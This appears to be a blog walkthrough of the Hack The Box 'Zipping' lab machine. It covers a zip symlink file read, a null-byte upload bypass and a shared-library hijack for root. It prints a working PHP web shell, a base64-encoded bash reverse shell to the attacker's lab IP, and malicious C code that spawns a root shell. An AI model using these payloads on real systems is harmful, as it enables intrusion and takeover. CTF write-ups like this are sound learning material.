Open in app

Sign in

Write

Sign in

Hack the Box: Zipping Walkthrough

Al Azhar Rizqi
7 min readSep 4, 2023

--

First of all, this is the first medium-level machine on Hack The Box that I’ve completed, and it’s also the first time I’ve written an article. So, I’ve decided to share my walkthrough on how to exploit this box and gain user-root privileges. Without any further do, let’s dive in.

Recon

nmap

When I run nmap, there are two open tcp ports 22(ssh) and 80 (http).

I also add host machine to /etc/hosts

Site

It is a watch store website called “Zipping.” There are several pages that display all products, product details, a cart, and a curriculum file upload.

Exploit

I assumed that there are several attack vectors, such as id product parameter and file upload. First, I conducted a id parameter test with SQLmap, but the result was nothing. However, the part that piqued my interest was the file upload page.

According to the description on the file upload page, the website will accept zip files, and inside these zip files, there must be a PDF file.

Overview about symlink

A symlink (also called a symbolic link) is a type of file in Linux that points to another file or a folder on your computer. Symlinks are similar to shortcuts in Windows. References: zip symlink vulnerability

I tried a symlink attack to achieve arbitrary file read. References: how zip symlink works

I uploaded zip file into website, but there’s nothing when I open in browser.

Then, I try to use curl and it works.

According to the /etc/passwd file, the username is “rektsu.” I also obtained the source code. However, after experimenting, I found that I could only read files but couldn’t write or execute them. This part was challenging for me.

Then I create php web shell script and set the listener like below.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

I tried the file upload methodology outlined by HackTricks, attempting to bypass file extension checks to achieve Remote Code Execution (RCE), but in the end, it was nothing.

When I intercept the zip upload, among the weird characters, there were two PDF file names as shown below.

Then, I try play around them until I can bypass file upload restrictions. The key is change “A” (41 in hex) in webshell.phpA.pdf to null (00 in hex) at the second file, then forward.

When opening the file in the browser, it is still same 404 not found.

Then I deleted everything after “.php”, and it worked. The web shell appeared.

I tried to input a reverse shell payload to obtain a shell, but it didn’t work.

Then I crafted the payload like below.

➜ zharsuke@box  ~  echo "/bin/bash -i >& /dev/tcp/10.10.14.92/2424 0>&1 " | base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkyLzI0MjQgMD4mMSAK
➜ zharsuke@box  ~  echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkyLzI0MjQgMD4mMSAK | base64 -d | bash
  • First, I change it to base64.
  • Then echo base64 text, decrypt it, and generate bash.

And I got the shell.

Read the user flag :

rektsu@zipping:/home/rektsu$ cat user.txt
cat user.txt
e1b53***************************

Login SSH with id_rsa

I prefer logging in with SSH instead of upgrading my reverse shell because I don’t like the reverse shell interface with just white fonts.

Generate id_rsa on local box.

➜ zharsuke@box  ~/.ssh  ssh-keygen -t rsa

create server on local box with python like below.

While on target machine download id_rsa.pub with wget.

Add id_rsa.pub to authorized_keys

Then I can login to ssh.

Privilege Escalation

As usual, I use LinPEAS to see possible attack vector.

Overview about LinPEAS.

LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix* hosts.

On sudo -l section, there is binary that rektsu can run as sudo.

I try to run the binary, but unfortunately, it ask me for password.

Then I try to cat stock binary and found the password. The password is St0ckM4nager.

When I run the binary, there are 3 menu.

After playing around them, I try to reverse engineering to see running program the stock binary. After copy to local box, I use GDB GEF to reverse engineers.

Overview GDB GEF

GEF (pronounced ʤɛf - "Jeff") is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old school GDB. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development. Application developers will also benefit from it, as GEF lifts a great part of regular GDB obscurity, avoiding repeating traditional commands, or bringing out the relevant information from the debugging runtime.

set breakpoint at main function.

Run. Then ni to next instructions.

After a while, I found something that interesting me. There is shared library named libcounter.so inside /rektsu/.config directory.

But when I check it, there is nothing in .config directory.

After a while for googling I found the way to exploit. The idea is to create file that named libcounter.so then add with malicious code to get root shell.

exploit.c

#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -i");
}

After that, I compiled the script into libcounter.so, copied it to the .config directory, run “stock” as sudo, inserted the password, and gained root access!

Read the root flag :

root@zipping:~# cat root.txt
fb12****************************

Overall, I learned a lot of things from this box, and I am grateful. It took me one week to complete this box, but it made me even more excited to learn.

“Practice doesn’t make perfect, perfect practice makes perfect.”

--

--

Al Azhar Rizqi

Written by Al Azhar Rizqi

14 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams